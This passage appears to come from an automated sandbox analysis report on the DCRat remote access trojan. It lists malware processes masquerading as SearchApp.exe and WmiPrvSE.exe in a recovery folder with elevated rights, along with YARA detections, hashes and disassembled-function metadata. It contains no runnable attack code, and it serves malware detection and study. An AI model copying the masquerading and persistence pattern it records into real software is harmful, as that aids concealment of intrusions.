Wow64 process (32bit):	false
Commandline:	"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Imagebase:	0x390000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	07:57:04
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Imagebase:	0x640000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2356027652.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:57:05
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Imagebase:	0x160000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2365186797.0000000002431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:57:05
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\SearchApp.exe
Imagebase:	0x690000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2370785777.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\SearchApp.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\SearchApp.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:57:05
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\SearchApp.exe
Imagebase:	0x3e0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2362007456.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2362007456.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:57:05
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\WmiPrvSE.exe
Imagebase:	0x3b0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2364082505.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\WmiPrvSE.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:57:05
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\WmiPrvSE.exe
Imagebase:	0x5b0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2369951863.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:57:12
Start date:	24/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:57:16
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Imagebase:	0x260000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2354789966.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:57:24
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\WmiPrvSE.exe"
Imagebase:	0x960000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2448716973.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:57:33
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\SearchApp.exe"
Imagebase:	0x410000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2535198936.000000000259D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2535198936.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:57:41
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Imagebase:	0x1a0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2613445983.00000000024E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2613445983.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:57:50
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\WmiPrvSE.exe"
Imagebase:	0x1c0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.2703597080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:57:58
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\SearchApp.exe"
Imagebase:	0xe00000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002D.00000002.2800446786.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002D.00000002.2800446786.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:58:07
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Imagebase:	0xa80000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002E.00000002.2878007510.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002E.00000002.2878007510.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:58:15
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\WmiPrvSE.exe"
Imagebase:	0x620000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002F.00000002.2962029789.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002F.00000002.2962029789.0000000002820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:58:23
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\SearchApp.exe"
Imagebase:	0xf30000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000030.00000002.3048134310.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000030.00000002.3048134310.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:58:32
Start date:	24/10/2024
Path:	C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe"
Imagebase:	0xfc0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000031.00000002.3137179400.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:58:40
Start date:	24/10/2024
Path:	C:\Recovery\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\WmiPrvSE.exe"
Imagebase:	0xec0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000032.00000002.3211729351.000000000319D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000032.00000002.3211729351.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000032.00000002.3211729351.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:58:49
Start date:	24/10/2024
Path:	C:\Recovery\SearchApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\SearchApp.exe"
Imagebase:	0x940000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.3307757545.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.3307757545.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.3307757545.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FF848F10F88 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f1cdf5071d899e4882d99ea64f504315efb14ea8a77fbd0752ac1e5f143d43b
Instruction ID: 1b350ff1aeae34b0c5047232a6ec0b1ca847851aeb56fcb8fb923e3658f511d5
Opcode Fuzzy Hash: 6f1cdf5071d899e4882d99ea64f504315efb14ea8a77fbd0752ac1e5f143d43b
Instruction Fuzzy Hash: E642C170D1962D8FDBA8EF28C8947E9B7B1FB58341F5045B9D00EA7281DB386A81CF54

Function 00007FF848F13250 Relevance: 15.4, Strings: 12, Instructions: 365COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F13302
8XH, xrefs: 00007FF848F1334C
8XH, xrefs: 00007FF848F133DE
8XH, xrefs: 00007FF848F13370
8XH, xrefs: 00007FF848F1344A
8XH, xrefs: 00007FF848F135A6
8XH, xrefs: 00007FF848F13294
8XH, xrefs: 00007FF848F134FC
8XH, xrefs: 00007FF848F13427
&, xrefs: 00007FF848F134CA
8XH, xrefs: 00007FF848F133BA
8XH, xrefs: 00007FF848F132DE

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$&
API String ID: 0-4246158259
Opcode ID: 73717c6b0b757bb01d8216c4c97abd30292a673a04299682270ac89bf6d2d25c
Instruction ID: 0c9f842d99da3d39af1790a8867f74c1e01d9ddc03e79e4b051cbaf3e53016f4
Opcode Fuzzy Hash: 73717c6b0b757bb01d8216c4c97abd30292a673a04299682270ac89bf6d2d25c
Instruction Fuzzy Hash: 05D13631D196599FEB98EB68C8A5BB8B7B1FF59340F0441B9D04DE3282CF386984CB14

Function 00007FF848F13239 Relevance: 12.8, Strings: 10, Instructions: 310COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F13302
8XH, xrefs: 00007FF848F1334C
8XH, xrefs: 00007FF848F133DE
8XH, xrefs: 00007FF848F13370
8XH, xrefs: 00007FF848F1344A
8XH, xrefs: 00007FF848F135A6
8XH, xrefs: 00007FF848F13294
8XH, xrefs: 00007FF848F13427
8XH, xrefs: 00007FF848F133BA
8XH, xrefs: 00007FF848F132DE

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH
API String ID: 0-537614338
Opcode ID: 79dcf6617f86118bcb21409f13ced2f2076c21d1fe6e7d55691e840cfd4210db
Instruction ID: 3c7169967432d2012e2239643e79078fd8f1770accaa265ac4cfeac392a710e3
Opcode Fuzzy Hash: 79dcf6617f86118bcb21409f13ced2f2076c21d1fe6e7d55691e840cfd4210db
Instruction Fuzzy Hash: F4B14631D19A9A8FEB98EB68C8657B8B7A1FF55340F0441B9D04DE32D2CF386984CB15

Function 00007FF848F17C89 Relevance: 1.6, Strings: 1, Instructions: 335COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F17CC9

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: 8XH
API String ID: 0-955928957
Opcode ID: bc3492822105ea295a6aa531a26439641955cdee66c4b83bb9cd0f4d4d1690b2
Instruction ID: 0ebe64f8026d2e70e7263f9032c1fe1132488ff2a3f0ebbe07efdf3fc6bdcf56
Opcode Fuzzy Hash: bc3492822105ea295a6aa531a26439641955cdee66c4b83bb9cd0f4d4d1690b2
Instruction Fuzzy Hash: CFC15771D2C91D8EEB95EB6884857ADB7A1FF59340F908179C40DE32C6CB386C86DB44

Function 00007FF848F105D8 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F11337

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: 4f04ed8cd5b1ef15b4b56a5ac71efd4b35463543fcbf297cc84b7670e60111f4
Instruction ID: aa90e76627a058117b739946e69edf04b4866dab82ebb3923cb671390827b0b6
Opcode Fuzzy Hash: 4f04ed8cd5b1ef15b4b56a5ac71efd4b35463543fcbf297cc84b7670e60111f4
Instruction Fuzzy Hash: E181C031A1CA8A8FDB98EF1888615B977E2FF99744F14057DE44EC32C6DE34AC428785

Function 00007FF848F10EF8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

$R_H, xrefs: 00007FF848F2AB6E

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: $R_H
API String ID: 0-604542354
Opcode ID: 319120cc6c7c72e6e5c44e3ae1c70da343cf2b2ab50f9a1cda1211dd75f58bcb
Instruction ID: e00460aec18a53c1827f507564b9219490895536611d3de8c0d3c1c118201bba
Opcode Fuzzy Hash: 319120cc6c7c72e6e5c44e3ae1c70da343cf2b2ab50f9a1cda1211dd75f58bcb
Instruction Fuzzy Hash: AE81D230A1891DCFDB98EB68E895BADB7F1FF69301F500169E40DE7291DB35A881CB44

Function 00007FF848F1129D Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F11337

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: X}H
API String ID: 0-959446611
Opcode ID: 223393dec78dc0890f29c0dd9a63626b1cd693ad4971e72e29c2380d844ffe9d
Instruction ID: 271d05678e6538facf9d355bfd90c1b72ded1bfcdf47c41b58c82ba1a015705d
Opcode Fuzzy Hash: 223393dec78dc0890f29c0dd9a63626b1cd693ad4971e72e29c2380d844ffe9d
Instruction Fuzzy Hash: F451CF31A1CA898FDB48EF1888655BA77E2FB98744F14417ED44AC3286DF34EC42CB85

Function 00007FF848F1E348 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F1E3C2

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4c15cd38a0afc9430ffd78178bf550f57211a607bd1d1392c63258d2b4082c69
Instruction ID: e4b4eb63a5cc88461590d4c1835ffba2fb17d241a2034c0e706c09a63ff1f52d
Opcode Fuzzy Hash: 4c15cd38a0afc9430ffd78178bf550f57211a607bd1d1392c63258d2b4082c69
Instruction Fuzzy Hash: 3A512530D0C54A9FEB59EBA8C4A45BDBBB1FF49340F1045AAC00AE72C6DF3869458B54

Function 00007FF848F23409 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

u, xrefs: 00007FF848F238A1

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-1515575680
Opcode ID: 62b27a45ff79a2a987ef7602ac47c0ad17d5638937dba9c6bb866537e40fe6aa
Instruction ID: a51270c42afcefb329c95cfa089e3e92f63e6bb904e2c2f2fb295c22a0a16080
Opcode Fuzzy Hash: 62b27a45ff79a2a987ef7602ac47c0ad17d5638937dba9c6bb866537e40fe6aa
Instruction Fuzzy Hash: 1A31E4B2C0D1969FF76A776C68151F93B90EF42790F2801BAD44E8B1E3DF1E6811825B

Function 00007FF848F11CA9 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

xmH, xrefs: 00007FF848F11D63

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: xmH
API String ID: 0-1583574247
Opcode ID: d5374412f00e569c030135d0ec3a55460be14092617792bf951c3dd93d3e8823
Instruction ID: db844b7f14bb197f34c0c4aba22dd8c5dac0be49bc75cd46bd3dbe12838e7181
Opcode Fuzzy Hash: d5374412f00e569c030135d0ec3a55460be14092617792bf951c3dd93d3e8823
Instruction Fuzzy Hash: 91414771D09A1D8FDB84EB68D494AECBBF0FF59341F5000BAD009E7292DB38A985CB14

Function 00007FF848F1CDB9 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

VN_L, xrefs: 00007FF848F1CE72

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: VN_L
API String ID: 0-4151272328
Opcode ID: fb327eb848c2fc06dde9192224839bc40d49eee2cd0ca3638137f46d2c32a687
Instruction ID: f4c3c2bff5e8e7aade78e550785bd010e8d802daff0437eed8052f2afc1c8ffb
Opcode Fuzzy Hash: fb327eb848c2fc06dde9192224839bc40d49eee2cd0ca3638137f46d2c32a687
Instruction Fuzzy Hash: BF31B130E1C91A8FE764EB1894459BCBBE1FF48790F150076E00EC32D1EF296C019389

Function 00007FF848F20360 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

u, xrefs: 00007FF848F27861

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-1515575680
Opcode ID: b505748b34e5faec53dec3f302f1c681e330a55ede542c03cef4e2a65623dea3
Instruction ID: 4ad55c3b4c048269e10d900a854343e72961a9ddf8669404f96f1e13f5526432
Opcode Fuzzy Hash: b505748b34e5faec53dec3f302f1c681e330a55ede542c03cef4e2a65623dea3
Instruction Fuzzy Hash: 15310430D1C94EDEEBA8EB58A4515FE76A1FF44340F70017AD40ED22C1DB3A6940DA89

Function 00007FF848F237EA Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

u, xrefs: 00007FF848F238A1

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-1515575680
Opcode ID: 1ead1b09f9fd39f9271d1836aa696abf02f171bfdc4a74478fedac716654cd9d
Instruction ID: 929916ee40e28baafa7cd4bd751b959df1de81a3f0a2bb01414da2e662167909
